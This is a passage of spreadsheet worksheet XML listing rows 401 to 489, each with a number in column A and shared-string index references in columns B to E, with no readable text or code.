      <c r="D401" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E401" s="110" t="s">
        <v>3552</v>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="101">
        <v>17778.0</v>
      </c>
      <c r="B402" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C402" s="103" t="s">
        <v>2024</v>
      </c>
      <c r="D402" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E402" s="105" t="s">
        <v>3553</v>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="106">
        <v>17869.0</v>
      </c>
      <c r="B403" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C403" s="108" t="s">
        <v>2027</v>
      </c>
      <c r="D403" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E403" s="110" t="s">
        <v>3554</v>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="101">
        <v>18041.0</v>
      </c>
      <c r="B404" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C404" s="103" t="s">
        <v>2030</v>
      </c>
      <c r="D404" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E404" s="105" t="s">
        <v>3555</v>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="106">
        <v>18092.0</v>
      </c>
      <c r="B405" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C405" s="108" t="s">
        <v>2033</v>
      </c>
      <c r="D405" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E405" s="110" t="s">
        <v>3556</v>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="101">
        <v>18424.0</v>
      </c>
      <c r="B406" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C406" s="103" t="s">
        <v>2036</v>
      </c>
      <c r="D406" s="104" t="s">
        <v>3024</v>
      </c>
      <c r="E406" s="105" t="s">
        <v>3557</v>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="106">
        <v>18597.0</v>
      </c>
      <c r="B407" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C407" s="108" t="s">
        <v>2039</v>
      </c>
      <c r="D407" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E407" s="110" t="s">
        <v>3558</v>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="101">
        <v>18751.0</v>
      </c>
      <c r="B408" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C408" s="103" t="s">
        <v>2045</v>
      </c>
      <c r="D408" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E408" s="105" t="s">
        <v>3559</v>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="106">
        <v>19159.0</v>
      </c>
      <c r="B409" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C409" s="108" t="s">
        <v>2051</v>
      </c>
      <c r="D409" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E409" s="110" t="s">
        <v>3560</v>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="101">
        <v>19280.0</v>
      </c>
      <c r="B410" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C410" s="103" t="s">
        <v>2057</v>
      </c>
      <c r="D410" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E410" s="105" t="s">
        <v>3561</v>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="106">
        <v>19368.0</v>
      </c>
      <c r="B411" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C411" s="108" t="s">
        <v>2060</v>
      </c>
      <c r="D411" s="109" t="s">
        <v>3024</v>
      </c>
      <c r="E411" s="110" t="s">
        <v>3562</v>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="101">
        <v>20013.0</v>
      </c>
      <c r="B412" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C412" s="103" t="s">
        <v>2063</v>
      </c>
      <c r="D412" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E412" s="105" t="s">
        <v>3563</v>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="106">
        <v>20375.0</v>
      </c>
      <c r="B413" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C413" s="108" t="s">
        <v>2066</v>
      </c>
      <c r="D413" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E413" s="110" t="s">
        <v>3564</v>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="101">
        <v>21754.0</v>
      </c>
      <c r="B414" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C414" s="103" t="s">
        <v>2078</v>
      </c>
      <c r="D414" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E414" s="105" t="s">
        <v>3565</v>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="106">
        <v>22071.0</v>
      </c>
      <c r="B415" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C415" s="108" t="s">
        <v>2081</v>
      </c>
      <c r="D415" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E415" s="110" t="s">
        <v>3566</v>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="101">
        <v>22986.0</v>
      </c>
      <c r="B416" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C416" s="103" t="s">
        <v>2091</v>
      </c>
      <c r="D416" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E416" s="105" t="s">
        <v>3567</v>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="106">
        <v>22989.0</v>
      </c>
      <c r="B417" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C417" s="108" t="s">
        <v>2094</v>
      </c>
      <c r="D417" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E417" s="110" t="s">
        <v>3568</v>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="101">
        <v>23712.0</v>
      </c>
      <c r="B418" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C418" s="103" t="s">
        <v>2100</v>
      </c>
      <c r="D418" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E418" s="105" t="s">
        <v>3569</v>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="106">
        <v>23981.0</v>
      </c>
      <c r="B419" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C419" s="108" t="s">
        <v>2103</v>
      </c>
      <c r="D419" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E419" s="110" t="s">
        <v>3570</v>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="101">
        <v>24152.0</v>
      </c>
      <c r="B420" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C420" s="103" t="s">
        <v>2106</v>
      </c>
      <c r="D420" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E420" s="105" t="s">
        <v>3571</v>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="106">
        <v>24632.0</v>
      </c>
      <c r="B421" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C421" s="108" t="s">
        <v>2109</v>
      </c>
      <c r="D421" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E421" s="110" t="s">
        <v>3572</v>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="101">
        <v>24886.0</v>
      </c>
      <c r="B422" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C422" s="103" t="s">
        <v>2112</v>
      </c>
      <c r="D422" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E422" s="105" t="s">
        <v>3573</v>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="106">
        <v>25026.0</v>
      </c>
      <c r="B423" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C423" s="108" t="s">
        <v>2118</v>
      </c>
      <c r="D423" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E423" s="110" t="s">
        <v>3574</v>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="101">
        <v>25881.0</v>
      </c>
      <c r="B424" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C424" s="103" t="s">
        <v>2127</v>
      </c>
      <c r="D424" s="104" t="s">
        <v>2953</v>
      </c>
      <c r="E424" s="105" t="s">
        <v>3575</v>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="106">
        <v>275.0</v>
      </c>
      <c r="B425" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C425" s="108" t="s">
        <v>2130</v>
      </c>
      <c r="D425" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E425" s="110" t="s">
        <v>3576</v>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="101">
        <v>655.0</v>
      </c>
      <c r="B426" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C426" s="103" t="s">
        <v>2147</v>
      </c>
      <c r="D426" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E426" s="105" t="s">
        <v>3577</v>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="106">
        <v>785.0</v>
      </c>
      <c r="B427" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C427" s="108" t="s">
        <v>2159</v>
      </c>
      <c r="D427" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E427" s="110" t="s">
        <v>3578</v>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="101">
        <v>1259.0</v>
      </c>
      <c r="B428" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C428" s="103" t="s">
        <v>2177</v>
      </c>
      <c r="D428" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E428" s="105" t="s">
        <v>3579</v>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="106">
        <v>1432.0</v>
      </c>
      <c r="B429" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C429" s="108" t="s">
        <v>2180</v>
      </c>
      <c r="D429" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E429" s="110" t="s">
        <v>3580</v>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="101">
        <v>1439.0</v>
      </c>
      <c r="B430" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C430" s="103" t="s">
        <v>2183</v>
      </c>
      <c r="D430" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E430" s="105" t="s">
        <v>3581</v>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="106">
        <v>1447.0</v>
      </c>
      <c r="B431" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C431" s="108" t="s">
        <v>2186</v>
      </c>
      <c r="D431" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E431" s="110" t="s">
        <v>3582</v>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="101">
        <v>1824.0</v>
      </c>
      <c r="B432" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C432" s="103" t="s">
        <v>2197</v>
      </c>
      <c r="D432" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E432" s="105" t="s">
        <v>3583</v>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="106">
        <v>1842.0</v>
      </c>
      <c r="B433" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C433" s="108" t="s">
        <v>2203</v>
      </c>
      <c r="D433" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E433" s="110" t="s">
        <v>3584</v>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="101">
        <v>1979.0</v>
      </c>
      <c r="B434" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C434" s="103" t="s">
        <v>2209</v>
      </c>
      <c r="D434" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E434" s="105" t="s">
        <v>3585</v>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="106">
        <v>2235.0</v>
      </c>
      <c r="B435" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C435" s="108" t="s">
        <v>2215</v>
      </c>
      <c r="D435" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E435" s="110" t="s">
        <v>3586</v>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="101">
        <v>2504.0</v>
      </c>
      <c r="B436" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C436" s="103" t="s">
        <v>2218</v>
      </c>
      <c r="D436" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E436" s="105" t="s">
        <v>3587</v>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="106">
        <v>2718.0</v>
      </c>
      <c r="B437" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C437" s="108" t="s">
        <v>2221</v>
      </c>
      <c r="D437" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E437" s="110" t="s">
        <v>3588</v>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="101">
        <v>2856.0</v>
      </c>
      <c r="B438" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C438" s="103" t="s">
        <v>2224</v>
      </c>
      <c r="D438" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E438" s="105" t="s">
        <v>3589</v>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="106">
        <v>2858.0</v>
      </c>
      <c r="B439" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C439" s="108" t="s">
        <v>2227</v>
      </c>
      <c r="D439" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E439" s="110" t="s">
        <v>3590</v>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="101">
        <v>3394.0</v>
      </c>
      <c r="B440" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C440" s="103" t="s">
        <v>2245</v>
      </c>
      <c r="D440" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E440" s="105" t="s">
        <v>3591</v>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="106">
        <v>3711.0</v>
      </c>
      <c r="B441" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C441" s="108" t="s">
        <v>2251</v>
      </c>
      <c r="D441" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E441" s="110" t="s">
        <v>3592</v>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="101">
        <v>4469.0</v>
      </c>
      <c r="B442" s="102" t="s">
        <v>82</v>
      </c>
      <c r="C442" s="103" t="s">
        <v>2260</v>
      </c>
      <c r="D442" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E442" s="105" t="s">
        <v>3593</v>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="106">
        <v>4893.0</v>
      </c>
      <c r="B443" s="107" t="s">
        <v>82</v>
      </c>
      <c r="C443" s="108" t="s">
        <v>2263</v>
      </c>
      <c r="D443" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E443" s="110" t="s">
        <v>3594</v>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="101">
        <v>295.0</v>
      </c>
      <c r="B444" s="102" t="s">
        <v>84</v>
      </c>
      <c r="C444" s="103" t="s">
        <v>2266</v>
      </c>
      <c r="D444" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E444" s="105" t="s">
        <v>3595</v>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="106">
        <v>116.0</v>
      </c>
      <c r="B445" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C445" s="108" t="s">
        <v>2269</v>
      </c>
      <c r="D445" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E445" s="110" t="s">
        <v>3596</v>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="101">
        <v>118.0</v>
      </c>
      <c r="B446" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C446" s="103" t="s">
        <v>2272</v>
      </c>
      <c r="D446" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E446" s="105" t="s">
        <v>3597</v>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="106">
        <v>120.0</v>
      </c>
      <c r="B447" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C447" s="108" t="s">
        <v>2275</v>
      </c>
      <c r="D447" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E447" s="110" t="s">
        <v>3598</v>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="101">
        <v>156.0</v>
      </c>
      <c r="B448" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C448" s="103" t="s">
        <v>2278</v>
      </c>
      <c r="D448" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E448" s="105" t="s">
        <v>3599</v>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="106">
        <v>177.0</v>
      </c>
      <c r="B449" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C449" s="108" t="s">
        <v>2281</v>
      </c>
      <c r="D449" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E449" s="110" t="s">
        <v>3600</v>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="101">
        <v>179.0</v>
      </c>
      <c r="B450" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C450" s="103" t="s">
        <v>2284</v>
      </c>
      <c r="D450" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E450" s="105" t="s">
        <v>3601</v>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="106">
        <v>184.0</v>
      </c>
      <c r="B451" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C451" s="108" t="s">
        <v>2287</v>
      </c>
      <c r="D451" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E451" s="110" t="s">
        <v>3602</v>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="101">
        <v>199.0</v>
      </c>
      <c r="B452" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C452" s="103" t="s">
        <v>2290</v>
      </c>
      <c r="D452" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E452" s="105" t="s">
        <v>3603</v>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="106">
        <v>201.0</v>
      </c>
      <c r="B453" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C453" s="108" t="s">
        <v>2293</v>
      </c>
      <c r="D453" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E453" s="110" t="s">
        <v>3604</v>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="101">
        <v>202.0</v>
      </c>
      <c r="B454" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C454" s="103" t="s">
        <v>2296</v>
      </c>
      <c r="D454" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E454" s="105" t="s">
        <v>3605</v>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="106">
        <v>209.0</v>
      </c>
      <c r="B455" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C455" s="108" t="s">
        <v>2299</v>
      </c>
      <c r="D455" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E455" s="110" t="s">
        <v>3606</v>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="101">
        <v>221.0</v>
      </c>
      <c r="B456" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C456" s="103" t="s">
        <v>2302</v>
      </c>
      <c r="D456" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E456" s="105" t="s">
        <v>3607</v>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="106">
        <v>226.0</v>
      </c>
      <c r="B457" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C457" s="108" t="s">
        <v>2305</v>
      </c>
      <c r="D457" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E457" s="110" t="s">
        <v>3608</v>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="101">
        <v>235.0</v>
      </c>
      <c r="B458" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C458" s="103" t="s">
        <v>2308</v>
      </c>
      <c r="D458" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E458" s="105" t="s">
        <v>3609</v>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="106">
        <v>237.0</v>
      </c>
      <c r="B459" s="107" t="s">
        <v>86</v>
      </c>
      <c r="C459" s="108" t="s">
        <v>2311</v>
      </c>
      <c r="D459" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E459" s="110" t="s">
        <v>3610</v>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="101">
        <v>249.0</v>
      </c>
      <c r="B460" s="102" t="s">
        <v>86</v>
      </c>
      <c r="C460" s="103" t="s">
        <v>2314</v>
      </c>
      <c r="D460" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E460" s="105" t="s">
        <v>3611</v>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="106">
        <v>16.0</v>
      </c>
      <c r="B461" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C461" s="108" t="s">
        <v>2317</v>
      </c>
      <c r="D461" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E461" s="110" t="s">
        <v>3612</v>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="101">
        <v>26.0</v>
      </c>
      <c r="B462" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C462" s="103" t="s">
        <v>2320</v>
      </c>
      <c r="D462" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E462" s="105" t="s">
        <v>3613</v>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="106">
        <v>37.0</v>
      </c>
      <c r="B463" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C463" s="108" t="s">
        <v>2323</v>
      </c>
      <c r="D463" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E463" s="110" t="s">
        <v>3614</v>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="101">
        <v>82.0</v>
      </c>
      <c r="B464" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C464" s="103" t="s">
        <v>2326</v>
      </c>
      <c r="D464" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E464" s="105" t="s">
        <v>3615</v>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="106">
        <v>93.0</v>
      </c>
      <c r="B465" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C465" s="108" t="s">
        <v>2329</v>
      </c>
      <c r="D465" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E465" s="110" t="s">
        <v>3616</v>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="101">
        <v>166.0</v>
      </c>
      <c r="B466" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C466" s="103" t="s">
        <v>2332</v>
      </c>
      <c r="D466" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E466" s="105" t="s">
        <v>3617</v>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="106">
        <v>214.0</v>
      </c>
      <c r="B467" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C467" s="108" t="s">
        <v>2335</v>
      </c>
      <c r="D467" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E467" s="110" t="s">
        <v>3618</v>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="101">
        <v>409.0</v>
      </c>
      <c r="B468" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C468" s="103" t="s">
        <v>2338</v>
      </c>
      <c r="D468" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E468" s="105" t="s">
        <v>3619</v>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="106">
        <v>543.0</v>
      </c>
      <c r="B469" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C469" s="108" t="s">
        <v>2344</v>
      </c>
      <c r="D469" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E469" s="110" t="s">
        <v>3620</v>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="101">
        <v>568.0</v>
      </c>
      <c r="B470" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C470" s="103" t="s">
        <v>2347</v>
      </c>
      <c r="D470" s="104" t="s">
        <v>3046</v>
      </c>
      <c r="E470" s="105" t="s">
        <v>3621</v>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="106">
        <v>861.0</v>
      </c>
      <c r="B471" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C471" s="108" t="s">
        <v>2353</v>
      </c>
      <c r="D471" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E471" s="110" t="s">
        <v>3622</v>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="101">
        <v>913.0</v>
      </c>
      <c r="B472" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C472" s="103" t="s">
        <v>2356</v>
      </c>
      <c r="D472" s="104" t="s">
        <v>2953</v>
      </c>
      <c r="E472" s="105" t="s">
        <v>3623</v>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="106">
        <v>1036.0</v>
      </c>
      <c r="B473" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C473" s="108" t="s">
        <v>2359</v>
      </c>
      <c r="D473" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E473" s="110" t="s">
        <v>3624</v>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="101">
        <v>1064.0</v>
      </c>
      <c r="B474" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C474" s="103" t="s">
        <v>2362</v>
      </c>
      <c r="D474" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E474" s="105" t="s">
        <v>3625</v>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="106">
        <v>1160.0</v>
      </c>
      <c r="B475" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C475" s="108" t="s">
        <v>2365</v>
      </c>
      <c r="D475" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E475" s="110" t="s">
        <v>3626</v>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="101">
        <v>1239.0</v>
      </c>
      <c r="B476" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C476" s="103" t="s">
        <v>2371</v>
      </c>
      <c r="D476" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E476" s="105" t="s">
        <v>3627</v>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="106">
        <v>1436.0</v>
      </c>
      <c r="B477" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C477" s="108" t="s">
        <v>2374</v>
      </c>
      <c r="D477" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E477" s="110" t="s">
        <v>3628</v>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="101">
        <v>1722.0</v>
      </c>
      <c r="B478" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C478" s="103" t="s">
        <v>2377</v>
      </c>
      <c r="D478" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E478" s="105" t="s">
        <v>3629</v>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="106">
        <v>1776.0</v>
      </c>
      <c r="B479" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C479" s="108" t="s">
        <v>2383</v>
      </c>
      <c r="D479" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E479" s="110" t="s">
        <v>3630</v>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="101">
        <v>1808.0</v>
      </c>
      <c r="B480" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C480" s="103" t="s">
        <v>2386</v>
      </c>
      <c r="D480" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E480" s="105" t="s">
        <v>3631</v>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="106">
        <v>1838.0</v>
      </c>
      <c r="B481" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C481" s="108" t="s">
        <v>2389</v>
      </c>
      <c r="D481" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E481" s="110" t="s">
        <v>3632</v>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="101">
        <v>1884.0</v>
      </c>
      <c r="B482" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C482" s="103" t="s">
        <v>2392</v>
      </c>
      <c r="D482" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E482" s="105" t="s">
        <v>3633</v>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="106">
        <v>1917.0</v>
      </c>
      <c r="B483" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C483" s="108" t="s">
        <v>2395</v>
      </c>
      <c r="D483" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E483" s="110" t="s">
        <v>3634</v>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="101">
        <v>2039.0</v>
      </c>
      <c r="B484" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C484" s="103" t="s">
        <v>2406</v>
      </c>
      <c r="D484" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E484" s="105" t="s">
        <v>3635</v>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="106">
        <v>2125.0</v>
      </c>
      <c r="B485" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C485" s="108" t="s">
        <v>2412</v>
      </c>
      <c r="D485" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E485" s="110" t="s">
        <v>3636</v>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="101">
        <v>2371.0</v>
      </c>
      <c r="B486" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C486" s="103" t="s">
        <v>2418</v>
      </c>
      <c r="D486" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E486" s="105" t="s">
        <v>3637</v>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="106">
        <v>2434.0</v>
      </c>
      <c r="B487" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C487" s="108" t="s">
        <v>2431</v>
      </c>
      <c r="D487" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E487" s="110" t="s">
        <v>3638</v>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="101">
        <v>2583.0</v>
      </c>
      <c r="B488" s="102" t="s">
        <v>88</v>
      </c>
      <c r="C488" s="103" t="s">
        <v>2434</v>
      </c>
      <c r="D488" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E488" s="105" t="s">
        <v>3639</v>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="106">
        <v>2593.0</v>
      </c>
      <c r="B489" s="107" t="s">
        <v>88</v>
      </c>
      <c r="C489" s="108" t="s">
        <v>2437</v>
      </c>
      <c r="D489" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E489" s="110" t="s">
        <v>3640</v>
      </c>
    </row>
